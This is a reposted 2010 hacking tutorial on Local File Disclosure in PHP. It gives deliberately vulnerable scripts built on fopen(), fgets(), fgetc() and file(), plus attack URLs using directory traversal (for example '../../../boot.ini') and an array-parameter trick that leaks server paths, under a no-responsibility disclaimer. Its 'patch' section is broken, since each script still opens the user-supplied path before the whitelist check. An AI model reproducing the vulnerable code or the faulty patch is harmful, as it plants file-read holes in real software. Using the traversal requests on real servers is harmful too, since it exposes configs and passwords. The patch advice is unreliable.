File(),Fgets(),Fgetc() Local File Disclosure (LFD) Paper

blogfeifei
浏览: 1196246 次
最近访客更多访客>>

u012363178
cocos
deyimsf
577341236
博主相关

博客
微博
相册
留言
关于我
文章分类

全部博客 (1639)
社区版块

存档分类

2011-12 ( 2)
2011-11 ( 17)
2011-10 ( 194)
更多存档...
/*!----------------------------------------------------------*/
/*! File(),Fgets(),Fgetc() Local File Disclosure (LFD) Paper */                        
/*! Author   : hexon 				             */                             
/*! Tested On: Windows XP Home Edition SP2 & SP3             */
/*! Contact  : hkhexon@gmail.com                             */       
/*! Date     : 19th January 2010                             */   
/*!----------------------------------------------------------*/

=======
Preface
=======

As you can see , this is a paper about Local File Disclosure (LFD) , you may have asked that why did I wrote this paper as there are people who also contributed in this method like: 

Malaysian Script Kiddy(as requested) Ahlspiess - file_get_contents() , readfile()
Romanian Hacker Sirgod - file_get_contents(),readfile() 
Lebanon Hacker Moudi - readfile()  
French(if not mistaken) Hacker 599eme Man - readfile()

and now

(Unknown) Pentester Hexon - File() , Fgets() , Fgetc()

Well, since they had introduced those LFD methods,I will introduce another method which is very unlikely to happen but may still happen(but it also applies to the methods shown by the other four person).

NOTE : I do not hold any responsibility on what you do after learning the skills available at my paper.

=====
Intro
=====

Local File Disclosure is a flaw where the attacker can read the source codes of a particular file on the webserver.With the application of directory transversal skiil,Attackers can read important files like config.php where important information like usernames,passwords are stored and attackers can perform attacks on the webserver. 

=====================
Proof Of Concept(POC)
=====================

A Proof Of Concept(POC) would be needed to to prove that my theory does work. 

NOTE : You will need a webserver to read php codes so install a webserver like xampp (http://www.apachefriends.org/en/xampp.html).

Open a text editor and copy paste the codes. 

PUT ALL THE FILES AT the specified folder like /www/ at vertigo or /htdocs/ at xampp. 

=======
fgets()
=======

Save the following codes as fgets.html

/*! Code Start */

<html>
<title>
Fgets() POC
</title>
<form action = "fgets.php" method = "get" />
fgets() vulnerability <br />
<input type="text" name="fgets" />
<input type="submit" />
</form>
</html>

/*! End Code */

Save the following codes as fgets.php

/*! Code Start */

<?php

$vuln = fopen($_GET['fgets'],"r+") or exit("unable to open the specified file"); // vulnerable code
/* 
you can use "r", instead of "r+" but not "w","w+" as it clears the file , as well as "a","a+","x",and"x+" as they are not for file reading.
*/

while(!feof($vuln))
{
echo fgets($vuln) . "<br />";
}

fclose($vuln);

?>

/*! End Code */

=======
fgetc()
=======

Save the following codes as fgetc.html

/*! Code Start */

<html>
<title>
Fgetc() POC
</title>
<form action = "fgetc.php" method = "get" />
fgetc() LFD vulnerabiliy <br />
<input type="text" name="fgetc" />
<input type="submit" />
</form>
</html>

/*! End Code */

Save the following codes as fgetc.php

/*! Code Start */

<?php

$vuln = fopen($_GET['fgetc'],"r+") or exit("unable to open the specified file");  // vulnerable code

/* 
you can use "r", instead of "r+" but not "w","w+" as it clears the file , as well as "a","a+","x",and"x+" as they are not for file reading.
*/

while(!feof($vuln))
{
echo fgetc($vuln);   // NOTE : fgetc() is not suitable to read big files.
}

fclose($vuln);

?>

/*! End Code */

======
file()
======

Save the following codes as file.html

/*! Code Start */

<html>
<title>
File() POC
</title>
<form action = "file.php" method = "get" />
file() POC <br />
<input type="text" name="file" />
<input type="submit" />
</form>
</html>

/*! End Code */

Save the following codes as file.php

/*! Code Start */

<?php

$vuln =file($_GET['file']);  // the vulnerable code

print_r($vuln);     // print_r is used as print_r is used to output values of array.

?>

/*! End Code */

============
Exploitation
============

NOTE : Make sure that your apache server is running and the files are at the right location.

Try to open the fgets.html at your browser (do not open it directly by clicking at the file)

Example:

http://localhost/test/fgets.html

Method:
A textbox will appear and type the "filename" with "extension" that you want to read at it and click "Submit".

The method is the same for the other two.

Example:

http://localhost/test/fgetc.html

http://localhost/test/file.html

just put the filename and click Submit.

After you click Submit, you will be redirected to the fgets.php/fgetc/php/file.php(depending on which did you use)

Example :

http://localhost/test/fgets.php?fgets=filename.extension

http://localhost/test/fgetc.php?fgetc=filename.extension

http://localhost/test/file.php?file=filename.extension

====================
Further Exploitation
====================

Skills Required : Directory Transversal(compulsary),Full Path Disclosure(FPD) or even Partial Function Disclosure(PFD)(optional)

=====================
Directory Transversal
=====================

We can read files from other folders with the application of Directory Transversal technique.

By applying "../" , we can locate files at parent folder to read.

Example:

http://localhost/test/fgets.php?fgets=../filename.extension

http://localhost/test/fgetc.php?fgetc=../filename.extension

http://localhost/test/file.php?file=../filename.extension

We can read other folders by increasing the "../".

Example of a exploitation with directory transversal (Only for Windows):

http://localhost/test/fgets.php?fgets=../../../boot.ini

http://localhost/test/fgetc.php?fgetc=../../../boot.ini

http://localhost/test/file.php?file=../../../boot.ini

NOTE : There are a lot of files that you can read , use your imaginary skills.

===========================
Partial Function Disclosure
===========================

We can apply Partial Function Disclosure(PFD) Skill which is by adding a [] infront of "=" to make the name as a array.

http://localhost/test/fgets.php?fgets[]=

http://localhost/test/fgetc.php?fgetc[]=

http://localhost/test/file.php?file[]=

This will cause an error as it is not an array and the directory of the folder will be revealed (in the error) .

Example: (fgets.php is used)

http://localhost/test/fgets.php?fgets[]=

Warning: fopen() expects parameter 1 to be string, array given in I:/xampp/htdocs/test/fgets.php on line 3

I will not discuss on how to fix it as it is quite irrelevant , maybe I will include it in my next paper.

========
POC Test
========

This POC has been tested by me and Ahlspiess on Windows XP SP2 and SP3 but I do believe it works on all types of OS.

=====
Patch
=====

Since we have a way to exploit it , there must be a way to patch it.

This is a section for webdevelopers/webmasters as well as pentesters who do not know about this flaw. 

Apparently, I have two ways of patching it.

=======
Primary
=======

REMOVE IT !! Most web applications do not need to allow file read function as it is usually not used.
Webmasters can read source codes of the files without using those functions.

=========
Secondary
=========

If you insist on not removing it , then use switch or if logical statements to limit users from reading important files.But in this case , I will use switch as switch is more suitable for this.

Edit the codes or make a new file and delete the old ones.

=========
fgets.php
=========

/*! Code Start */

<?php

$vuln = fopen($_GET['fgets'],"r+") or exit("unable to open the specified file"); 
/* 
you can use "r", instead of "r+" but not "w","w+" as it clears the file , as well as "a","a+","x",and"x+"
*/
switch($_GET['fgets'])            // switch is added to filter user input
{
case 'a.html':                    // any filename would be appropriate.
case 'b':                         // any filename would be appropriate.
case 'd.php':                     // any filename would be appropriate.
case 'filename.extension':        // any filename would be appropriate. 

while(!feof($vuln))
{
echo fgets($vuln) . "<br />";
}

fclose($vuln);
break;

default:                          // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}
?>

/*! End Code */

=========
fgetc.php
=========

/*! Code Start */

<?php

$vuln = fopen($_GET['fgetc'],"r+") or exit("unable to open the specified file");

/* 
you can use "r", instead of "r+" but not "w","w+" as it clears the file , as well as "a","a+","x",and"x+"
*/

switch($_GET['fgetc'])                    // switch is added to filter user input
{
case 'a.html':                          // any filename would be appropriate.
case 'b':                               // any filename would be appropriate.
case 'd.php':                           // any filename would be appropriate.
case 'filename.extension':              // any filename would be appropriate.

while(!feof($vuln))
{
echo fgetc($vuln) ." ";
}

fclose($vuln);
break;

default:                                // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}


?>

/*! End Code */

========
file.php
========

/*! Code Start */

<?php

$vuln =file($_GET['file']);            // the vulnerable code

switch($_GET['file'])                  // switch is added to filter user input
{
case 'a.html':                         // any filename would be appropriate.
case 'b':                              // any filename would be appropriate.
case 'd.php':                          // any filename would be appropriate.
case 'filename.extension':             // any filename would be appropriate.

print_r($vuln);                        // print_r is used as print_r is used to output values of array.
break;

default:                               // for those who read files not in the list
echo "You do not have the permission to read this specific file";
}

?> 

/*! End Code */

======
Greetz
======

/*! My mind , feel free to contact me if you have something to ask/contribute */
/*! Ahlspiess for testing my LFD theory and give ideas eventhough I didn't used it*/
/*! w3schools(www.w3schools.com/)*/
分享到：